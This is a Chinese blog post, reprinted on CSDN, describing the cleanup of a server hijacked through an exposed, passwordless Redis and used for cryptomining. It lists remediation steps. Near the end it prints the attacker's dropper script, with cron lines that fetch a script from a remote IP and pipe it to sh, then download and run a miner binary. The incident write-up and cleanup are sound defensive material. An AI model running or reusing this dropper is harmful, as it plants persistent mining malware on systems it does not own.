记一次服务器被挖矿经历与解决办法

最新推荐文章于 2024-07-05 00:29:32 发布
最新推荐文章于 2024-07-05 00:29:32 发布
阅读量2k 收藏 2
点赞数
文章标签: 数据库 awk 运维
原文链接:http://blog.51cto.com/legehappy/2152838
版权

记一次服务器被挖矿经历与解决办法




在最近的某一天里面,中午的一个小息过后,突然手机的邮件和公众号监控zabbix的告警多了起来。我拿起手机一看原来是某台服务器上的CPU跑满了,就开始登上去看一下是哪个脚本导致负荷高的(在期间使用top -d 1命令查看负荷占用情况)。可以静下来想了下,中午大家都在休息不应该CPU负载会这么高的,心里想80%是服务器被黑了。

记一次服务器被挖矿经历与解决办法

后来发现是/tmp/ddgs.3013和/tmp/qW3xT.2这两个文件跑满了服务器CPU,后来决定先kill掉文件PID和删除/tmp目录下的文件,发现一删除就自动创建上了,怎么删除也不能解决掉。经过一系列的查找问题之后发现了crontab上把以前配置都覆盖掉了加上了一条(/5 * wget -q -O- http://165.225.157.157:8000/i.sh | sh)下载一个脚本的命令,但是第一时间就想到服务器被黑了。因为第一次遇见的原因当时心里“小鹿乱转”,后来查了点资料和问了一些同行才知道原来服务器被挖矿了,在度娘里面搜索到的很吓人。

记一次服务器被挖矿经历与解决办法




既然已经知道了是被什么gongji(51这也算是敏感字??)的了,也排查到它是经过扫描到我redis端口来黑的,那就对症下药吧!

  • 先在防火墙上设置redis端口限制在内网
    记一次服务器被挖矿经历与解决办法

  • 在排查下redis是否有设置密码

    vim  /usr/local/redis/redis.conf
requirepass yourpassword

  • 清除crontab的配置

    echo > /var/spool/cron/root
# 或者
systemctl stop crond

  • kill掉占用CPU高的两个文件

    ps -ef | grep /tmp/ddgs.3013 | awk '{print $2}' | xargs kill -9
ps -ef | grep /tmp/qW3xT.2 | awk '{print $2}' | xargs kill -9

  • 最后一步删除/tmp目录下两个文件

    rm -rf /tmp/ddgs.3013
rm -rf /tmp/qW3xT.2

    慢慢负载才降了下来,真的是心惊胆战啊,睡个觉就出现被挖矿的问题!后来回想了一下出现这种问题不外乎两种

  • 1、把redis端口暴露在外网
  • 2、redis没设置密码(因为本人是测试环境,偷了下懒没设置密码)

    本人很不才两种错误都犯了,也特此提醒自己以后这种错误别在犯了。最后提供上这个脚本的具体内容:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

转载于:https://blog.51cto.com/legehappy/2152838

weixin_33690367
关注
服务器挖矿了怎么办,实战清退
qq_14926283的博客
03-25 1777
然后看看有没有定时任务,有的时候它会定时去检测xmrig挖矿木马是否在正常运行,不正常它会重新去做一系列的处理,重新植入木马,这时候我们要去取消这些定时任务。注意这些看起来像系统进程的最好不要kill掉,容易出现意外,把生产环境的服务给干费了,那我们得去删掉这个后门用户怎么办。可以看到我这边有一个名为xmrig(有经验的这里看到名字直接就能判断)的进程霸占了100.3的资源,这里中招了。第一时间重启服务是不行的,这些挖矿木马一定是会伴随着你的重启而自动重启,一定时间内重新霸占你的服务器资源。
服务器挖矿问题解决
魏尚夫的成长之路
06-05 445
SSH爆破攻击分析即解决
CentOS:如何检查是否存在挖矿程序
最新发布
一些平时在开发过程中遇到的常见问题,分享给大家
07-05 433
CentOS:如何检查是否存在挖矿程序
服务器遭遇挖矿怎么办?
2401_84466316的博客
06-03 1562
我们先来了解下虚拟货币,以比特币为例,比特币是一种由开源的P2P软件产生的网络虚拟货币,它不依靠特定货币机构发行,通过特定算法的大量计算产生,比特币经济使用整个P2P网络中众多节点构成的分布式数据库来确认并录所有的交易行为。矿工需要为比特币网络提供的算法来换取比特币,每一个比特币的节点都会收集所有尚未确认的交易,并将其归集到一个数据块中,矿工节点会附加一个随机调整数,并计算前一个数据块的SHA-256散列运算值。
阿里云服务器挖矿怎么办
网站安全专家
02-11 5084
春节刚开始,我们SINE安全,发布了2018年服务器挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进行了详细的安全分析,为站长以及一些中小企业公司提出了合理的服务器安全防护建议。 在去年的虚拟币市场中,虽然虚拟币经历了暴跌的情况,但是服务器挖矿的情况还是持续性的增长趋势,背后是一些攻击者利用服务器的漏洞以及网站漏洞进行入侵服务器...
一次苦逼的服务器挖矿的清除过程
bobpen的专栏
02-21 2万+
环境说明 Centos 6.2 现象描述       通过top查看服务器资源,cpu资源几乎被占尽,但是top list里面却没有显示出是哪个进程占用的资源 而且系统会提示以下信息 通过关键字查询miner & crytonight,得知服务器被而已挖矿解决办法 1.linux进入single模式 进入singl
一次阿里云被挖矿处理
m0_61101264的博客
08-17 183
本篇文章还有很多的不足之处,并没有找到病毒攻击的入口,又是如何入侵到系统的,挖矿的脚本究竟运行在哪?按照正常的被攻击排错方式,一开始并不顺利。总结一下系统被入侵的排查思路,只是给后来者提供一下解决思路(希望大家的系统都很健壮,不被攻击)。查看系统的CPU和内存占用查询占用系统资源过高的进程排查定时任务,crontab -l或者目录检查异常端口,如发现,禁用端口,堵漏使用last命令查看系统异常登录情况(一般攻击者会抹去入侵录)使用history。
一种在外部中心化基础下的网络空间去中心化充盈区块链系统
farewellqian的博客
11-25 1万+
本文是《赛博空间学与赛博学》的第四章 赛博空间充盈计划 第四章内容全部一起放出,请点击下面推送阅读。可辅助上一期视频理解:网络补全计划! 区块链技术本质上就是赛博空间学的产物。在区块链的区块、链、奖励机制、合约、金融等等环节,我们都分析了这些环节的空间结构及其鲁棒性。同时确立了赛博空间学的第一定律。这条定律揭示了区块链技术的一个通向现实世界通道。借助于这种穿透诸赛博空间的通道,我们看到了区块链背后的每个部分都暗藏着现实世界的意识形态。同样,正是一种超出赛博空间的视角得诞生,使得我们可以把网络
如何引导机器?如何面临人机结合?《​人工智能与人类未来》
乐生活与爱IT
04-01 1万+
[微信公众号 乐生活与爱]公众号曾转载过蔡恒进教授的奇文|意识如何演化?机器何时有自我意识?《附着与隧通-心智的工作模式》,值得反复也读。我上周听了由北京大学博古睿研究中心、中国人民大学哲学院、中国人民大学哲学与认知科学交叉平台、服务器艺术联合主办的“贞下起元:真实之虚幻 虚拟之现实”论坛,尤其是朱嘉明和段永朝等老师的演讲,引起了我的思考和问题:我们该如何面临将要到来的人...
区块链关键技术4(笔)
qq_52215423的博客
10-13 2676
POW、POS、DPOS
测试面试题(六)
weixin_50623280的博客
04-16 3161
1.osi七层模型 七层模型,亦称OSI(Open System Interconnection)。参考模型是国际标准化组织(ISO)制定的一个用于计算机或通信系统间互联的标准体系,一般称为OSI参考模型或七层模型。 它是一个七层的、抽象的模型体,不仅包括一系列抽象的术语或概念,也包括具体的协议。 2.公司的测试流程 1、测试需求分析阶段:阅读需求,理解需求,主要就是对业务的学习,分析需求点,参与需求评审会议。 2、测试计划阶段:主要任务就是编写测试计划,参考软件需求规格说明书,项目总体计划,内容包括测试范
一次linux服务器挖矿的解决
qq_32394351的博客
05-26 3311
闲来登录了一下腾讯云控制台,发现资源监控面板服务器的cpu利用率一直100%以上,甚至达到了130% 反常必有妖,毕竟我服务器除了挂了个docker几乎是没开其他应用的,一定有异常程序在作怪。 进入服务器,输入 top -c 发现有一个程序就占用100%以上的cpu,后面对应的command是: /tmp/kdevtmpfsi 百度去查了一下,发现这是一个挖矿程序,好家伙,原来服务器两个月前就被置入挖矿了。 那时候我做了什么?无非是拉取了别人的几个docker镜像,难不成docker镜像里投.
解决:服务器挖矿程序的一次实战录~
程序猿的博客
04-24 1010
早上来公司,客户报系统不能登陆了。我以为简单的应用挂机问题,后来发现是cpu超200。直接使服务器宕机!猜测是被植入了挖矿程序,后来经过证实果然是。于是开始和植马的狠人斗智斗勇。用尽浑身解数终于解码。在整个过程中,发现这个人是个狠人,做事不留痕迹,定时植入的漂漂亮亮。假若有缘,可以交个朋友,一起探索渗透技术,哈哈!或者当个红帽子!下面跟大家介绍这个狠人的招数,我为何说是个狠人,是有...
阿里云服务器挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
今天你的服务器被"挖矿"了吗?
夜深的猫
06-21 1万+
前几天我朋友给我反馈他的网站打开特别慢,我起初以为他网站访问人数多了并发高了、或者带宽不足、或者代码写质量问题、再或者SQL查询响应慢,或者 Redis “门”开着没关。我立马上服务器看了 top 了下,我惊呆了麻蛋 CPU 98%,第一想法就是粗事了,被干了。 登录到服务器 发现redis 开着门的,redis 未设置密码,且为 root 身份,允许任何源访问,看了下redis 储存的值
云主机8088端口被挖矿情况以及解决办法
大门的博客
07-07 2052
1.用top命令查询一下有没有CPU占用很高的 [hadoop@10-9-15-140 ~]$ top top - 18:59:17 up 2:05, 1 user, load average: 0.36, 0.38, 0.68 Tasks: 97 total, 1 running, 96 sleeping, 0 stopped, 0 zombie Cpu(s): 13.0%...
解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)
墨痕诉清风的博客
05-15 7386
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安全事件。建议登录云盾-态势感知控制台查看详情和处理。于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。解决办法:1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。
服务器挖矿了需要重装系统吗
06-10
一般情况下,云服务器挖矿后最好的解决办法是重装系统。因为挖矿病毒通常会在系统中留下一些后门或者恶意程序,这些程序可能会继续在后台运行,重新感染服务器或者窃取敏感信息。所以,为了确保服务器安全,建议重...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值